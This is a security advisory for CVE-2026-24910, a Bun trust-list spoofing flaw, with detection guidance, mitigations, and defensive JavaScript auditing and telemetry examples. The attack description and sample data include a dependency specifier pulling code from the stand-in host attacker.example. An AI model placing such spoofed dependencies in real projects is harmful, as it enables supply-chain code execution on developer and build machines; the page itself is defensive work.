CVE-2026-24910 Overview
CVE-2026-24910 is a trust boundary vulnerability in Bun, the JavaScript runtime and package manager, affecting versions prior to 1.3.5. The flaw allows a non-npm package to spoof entries in the default trusted dependencies list, also known as the trust allow list. An attacker can exploit this when a package referenced via file, link, git, or github protocols shares a name with a trusted npm package. The vulnerability is classified under CWE-348: Use of Less Trusted Source.
Critical Impact
Spoofed trusted dependencies can execute lifecycle scripts during installation, enabling supply chain compromise on developer machines and build infrastructure.
Affected Products
- Bun runtime and package manager versions before 1.3.5
- Development environments using Bun for dependency resolution
- CI/CD pipelines executing bun install against untrusted manifests
Discovery Timeline
- 2026-01-27 - CVE-2026-24910 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2026-24910
Vulnerability Analysis
Bun maintains a default trusted dependencies list that automatically permits postinstall and other lifecycle scripts to execute for well-known packages. The trust check matches against the package name without sufficiently validating the package source. When a manifest declares a dependency using a non-registry specifier such as file:, link:, git:, or github:, and that dependency carries a name identical to a trusted npm package, Bun treats it as trusted. This allows arbitrary local or remote code referenced by these protocols to inherit the trust posture intended only for verified registry packages.
The issue is tracked alongside a broader disclosure of JavaScript package manager weaknesses. Further context is available in the Bun 1.3.5 release notes and the Koi.ai PackageGate disclosure.
Root Cause
The root cause is reliance on the package name alone as the trust identifier. The trust comparison does not bind the allow list entry to a specific registry origin or integrity hash. Any specifier that resolves to a matching name satisfies the check.
Attack Vector
An attacker authors a package.json that references a malicious source such as git+https://attacker.example/pkg and sets the dependency name to match an entry on Bun's trust allow list. When a developer runs bun install, the malicious package's lifecycle scripts execute without prompting. Exploitation requires local interaction with the manifest, consistent with the local attack vector classification.
No verified proof-of-concept code is publicly available. See the SC World coverage for additional reporting on the disclosure cluster.
Detection Methods for CVE-2026-24910
Indicators of Compromise
- Unexpected child processes spawned by bun or bun install during dependency installation
- package.json entries that reference file:, link:, git:, or github: sources using names of popular npm packages
- Outbound network connections from build hosts to non-registry git endpoints during install operations
Detection Strategies
- Audit lockfiles and manifests for dependency names that conflict with well-known registry packages but resolve to non-registry specifiers
- Inspect Bun installation logs for lifecycle script execution tied to dependencies that should not be on the trust list
- Compare resolved dependency origins against an internal allow list of approved registries
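The manifest audit described in the strategies above, as an added example (not Bun's own code or tooling, and not from the disclosure sources): it scans a package.json for dependencies whose specifier resolves outside the npm registry and flags those whose name collides with an entry on a trusted-names list, which is exactly the CVE-2026-24910 pattern. The TRUSTED_NAMES set and SAMPLE_MANIFEST are constructed placeholders; for real use, populate the set from Bun's own default trusted list or your organisation's trustedDependencies policy. The file:, link:, git:, and github: protocols are the ones the advisory names; git+https:, git+ssh: and similar forms are counted as git, since the attack vector section uses git+https.

```javascript
// Added example, not part of Bun or of this advisory's sources: audit a
// package.json for the spoofing pattern behind CVE-2026-24910, i.e. a dependency
// that carries a trusted package name but resolves to a non-registry source.

// Constructed stand-in for Bun's default trusted list. Replace with the real
// default list (or your own trustedDependencies policy) before use.
const TRUSTED_NAMES = new Set(["example-trusted-a", "example-trusted-b"]);

// Specifier prefixes that resolve outside the npm registry. git+https:, git+ssh:
// and similar are treated as the git protocol.
const NON_REGISTRY = /^(file:|link:|git:|git\+[a-z]+:|github:)/i;

const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];

// Returns "registry" for ordinary semver/tag specifiers, otherwise one of
// "file", "link", "git", "github".
function classifySpecifier(spec) {
  const m = NON_REGISTRY.exec(String(spec).trim());
  if (!m) return "registry";
  return m[1].toLowerCase().replace(/\+.*$/, "").replace(/:$/, "");
}

// Every non-registry dependency, annotated with whether its name collides with
// a trusted name. The collision is the high-confidence signal; link:/file: on
// their own are routine in monorepos and should not page anyone by themselves.
function auditManifest(manifest, trustedNames = TRUSTED_NAMES) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    const deps = manifest[field];
    if (!deps || typeof deps !== "object") continue;
    for (const [name, spec] of Object.entries(deps)) {
      const source = classifySpecifier(spec);
      if (source === "registry") continue;
      findings.push({ field, name, specifier: spec, source, spoofsTrustedName: trustedNames.has(name) });
    }
  }
  return findings;
}

// Only the entries that reproduce the CVE-2026-24910 pattern.
function spoofedEntries(manifest, trustedNames = TRUSTED_NAMES) {
  return auditManifest(manifest, trustedNames).filter((f) => f.spoofsTrustedName);
}

// Constructed sample manifest: two spoofed entries, one benign workspace link,
// one ordinary registry dependency.
const SAMPLE_MANIFEST = {
  name: "example-app",
  dependencies: {
    "example-trusted-a": "git+https://attacker.example/pkg",
    "ordinary-lib": "^1.2.0",
    "internal-tool": "link:../tools/internal",
  },
  devDependencies: {
    "example-trusted-b": "file:./vendor/example-trusted-b",
  },
};

for (const f of spoofedEntries(SAMPLE_MANIFEST)) {
  console.log(`SPOOF ${f.field}.${f.name} -> ${f.specifier} (${f.source})`);
}
```

Run as a pre-commit hook or CI step over every package.json in the repository (and, if you already extract resolved URLs from your lockfile, feed those through classifySpecifier as well). On the sample manifest the script reports the git-sourced and file-sourced entries and stays silent on the workspace link, which is the behaviour you want in a monorepo.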
Monitoring Recommendations
- Enable process telemetry on developer workstations and CI runners to capture script execution chains rooted in bun
- Forward package manager logs to a centralized analytics platform for retroactive hunting
- Alert on git or HTTPS fetches performed by package managers to domains outside approved infrastructure
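The two host-side indicators above (child processes rooted in bun install, and fetches to hosts outside approved infrastructure during an install) can be turned into detection logic over process and network telemetry. The following is an added example, not Bun's or any EDR vendor's tooling: it reconstructs the process tree from constructed JSON-lines events, finds every process whose ancestry includes a bun install, and flags network events from that subtree whose destination is not on an approved-hosts list. The event schema, the APPROVED_HOSTS set and the SAMPLE_TELEMETRY lines are all constructed assumptions; adapt the field names to whatever your telemetry pipeline emits.

```javascript
// Added example, not part of Bun or of any vendor's detection content: surface
// the CVE-2026-24910 host indicators from process and network telemetry.

// Constructed sample events, one JSON object per line, in the shape a process
// telemetry pipeline might emit. Chain: bash -> bun install -> sh (postinstall).
const SAMPLE_TELEMETRY = [
  '{"ts":"2026-02-01T10:00:00Z","type":"process","host":"ci-runner-01","pid":4100,"ppid":1,"exe":"/bin/bash","cmdline":"bash build.sh"}',
  '{"ts":"2026-02-01T10:00:01Z","type":"process","host":"ci-runner-01","pid":4101,"ppid":4100,"exe":"/usr/local/bin/bun","cmdline":"bun install"}',
  '{"ts":"2026-02-01T10:00:02Z","type":"network","host":"ci-runner-01","pid":4101,"dest":"registry.npmjs.org","port":443}',
  '{"ts":"2026-02-01T10:00:03Z","type":"network","host":"ci-runner-01","pid":4101,"dest":"attacker.example","port":443}',
  '{"ts":"2026-02-01T10:00:04Z","type":"process","host":"ci-runner-01","pid":4102,"ppid":4101,"exe":"/bin/sh","cmdline":"sh -c node postinstall.js"}',
  '{"ts":"2026-02-01T10:00:06Z","type":"process","host":"ci-runner-01","pid":4200,"ppid":1,"exe":"/usr/bin/sshd","cmdline":"sshd"}',
];

// Constructed allow list: the public registry plus an internal mirror.
const APPROVED_HOSTS = new Set(["registry.npmjs.org", "npm.internal.example"]);

function parseEvents(lines) {
  return lines.map((line) => JSON.parse(line));
}

// A bun process whose command line is an install is the root we care about.
function isBunInstall(proc) {
  return /(^|\/)bun$/.test(proc.exe) && /\binstall\b/.test(proc.cmdline);
}

// Returns findings in event order. Two rules:
//   child-of-bun-install          a process whose ancestry contains bun install
//   unapproved-fetch-during-install  a network event from that subtree to a
//                                    destination not on the approved list
function detect(lines, approvedHosts = APPROVED_HOSTS) {
  const events = parseEvents(lines);
  const procs = new Map();
  for (const e of events) if (e.type === "process") procs.set(e.pid, e);

  // Walk the ppid chain; the depth guard protects against cyclic or huge trees.
  function bunAncestor(pid, depth = 0) {
    const p = procs.get(pid);
    if (!p || depth > 32) return null;
    if (isBunInstall(p)) return p;
    return bunAncestor(p.ppid, depth + 1);
  }

  const findings = [];
  for (const e of events) {
    if (e.type === "process" && !isBunInstall(e)) {
      const root = bunAncestor(e.ppid);
      if (root) findings.push({ rule: "child-of-bun-install", host: e.host, pid: e.pid, cmdline: e.cmdline, rootPid: root.pid });
    } else if (e.type === "network" && bunAncestor(e.pid) && !approvedHosts.has(e.dest)) {
      findings.push({ rule: "unapproved-fetch-during-install", host: e.host, pid: e.pid, dest: e.dest, port: e.port });
    }
  }
  return findings;
}

for (const f of detect(SAMPLE_TELEMETRY)) {
  console.log(`${f.rule} host=${f.host} pid=${f.pid} ${f.dest || f.cmdline}`);
}
```

The child-of-bun-install rule fires on every lifecycle script, which is deliberate for a hunt but noisy as a paging alert; in production, baseline the scripts your trusted native dependencies legitimately run and alert on deviations, while keeping the unapproved-fetch rule as a hard alert since an install should never contact hosts outside your registry and mirror set.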
How to Mitigate CVE-2026-24910
Immediate Actions Required
- Upgrade Bun to version 1.3.5 or later on all developer workstations, build servers, and container images
- Review recent installs for manifests that reference non-registry dependencies sharing names with trusted npm packages
- Rotate credentials and tokens accessible from build environments if suspicious installs are identified
Patch Information
The vendor fix ships in Bun 1.3.5. The release tightens the trust allow list matching so that non-npm specifiers no longer inherit trust based on name alone. Release details are published in the Bun v1.3.5 announcement.
Workarounds
- Set the trusted dependencies list explicitly in package.json using the trustedDependencies field and remove reliance on Bun defaults
- Run bun install --ignore-scripts in untrusted contexts to suppress lifecycle script execution
- Pin dependencies to registry sources and reject manifests containing file:, link:, git:, or github: specifiers in code review
# Configuration example
bun install --ignore-scripts
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.